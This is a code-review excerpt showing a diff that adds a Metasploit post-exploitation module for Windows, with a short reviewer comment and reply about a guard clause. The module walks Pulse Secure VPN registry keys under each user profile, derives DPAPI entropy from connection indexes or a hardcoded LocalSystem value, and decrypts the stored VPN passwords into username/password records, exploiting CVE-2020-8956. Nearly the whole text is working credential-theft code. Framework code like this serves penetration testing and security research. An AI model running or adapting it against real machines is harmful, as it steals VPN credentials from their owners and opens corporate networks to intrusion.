modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,369 @@
+      key_names = registry_enumkeys("HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data")
+      key_names.each do |key_name|
+        ive_index = key_name[4..-1] # remove 'ive:'
+        # We get the encrypted password value from registry
+        reg_path = "HKEY_USERS\\#{profile['SID']}\\Software\\Pulse Secure\\Pulse\\User Data\\ive:#{ive_index}"
+        vals = registry_enumvals(reg_path)
+
+        next unless vals
+
+        vals.each do |val|
+          data = registry_getvaldata(reg_path, val)
+          if is_system?
+            if !data.starts_with?("{\x00c\x00a\x00p\x00i\x00}\x00 \x001\x00,")
+              next
+            else
+              # this means data was encrypted by elevated user using LocalSystem scope and fixed
+              # pOptionalEntropy value, adjusting parameters
+              data = [Rex::Text.to_ascii(data[18..-3])].pack('H*')
+              entropy = ['7B4C6492B77164BF81AB80EF044F01CE'].pack('H*')
+            end
+          else
+            # convert IVE index to DPAPI pOptionalEntropy value like PSC does
+            entropy = get_entropy_from_ive_index(ive_index).encode('UTF-16LE').bytes.pack("c*")
+          end
+
+          # it's not DPAPI data
+          if !data.starts_with?("\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB")
+            next
+          end
+
+          decrypted = decrypt_reg(data, entropy)
+          next unless decrypted != ''
+
+          if !ives.key?(ive_index)
+            # If the ive_index is not in gathered IVEs, this means it's a leftover from
+            # previously installed Pulse Secure Connect client versions.
+            #
+            # IVE keys of existing connections can get removed from connstore.dat and connstore.tmp
+            # when the new version is executed and that the client has more than one defined connection,
+            # leading to them not being inserted in the 'ives' array.
+            #
+            # However, the registry values are not wiped when Pulse Secure Connect is upgraded
+            # to a new version (including versions that fix CVE-2020-8956).
+            #
+            # TL;DR; We can still decrypt the password, but we're missing the URI and friendly
+            # name of that connection.
+            ives[ive_index] = {}
+            ives[ive_index]['connection-source'] = 'user'
+            ives[ive_index]['friendly-name'] = 'unknown'
+            ives[ive_index]['uri'] = 'unknown'
+            ives[ive_index]['creds'] = []
+          end
+          ives[ive_index]['creds'].append(
+            {
+              'username' => get_username(profile['SID'], ive_index),
+              'password' => decrypted.remove("\x00")
+            }
+          )
+          creds << ives[ive_index]
+        end
+      end
+    end
+    return creds
+  end
+
+  def gather_creds
+    print_status('Running credentials acquisition.')
+    ives = find_creds
+    if ives.any?
```

Comment:
The entire method is wrapped in this conditional. It would make more sense as a guard clause.

Reply:
Done (see 54e836e797).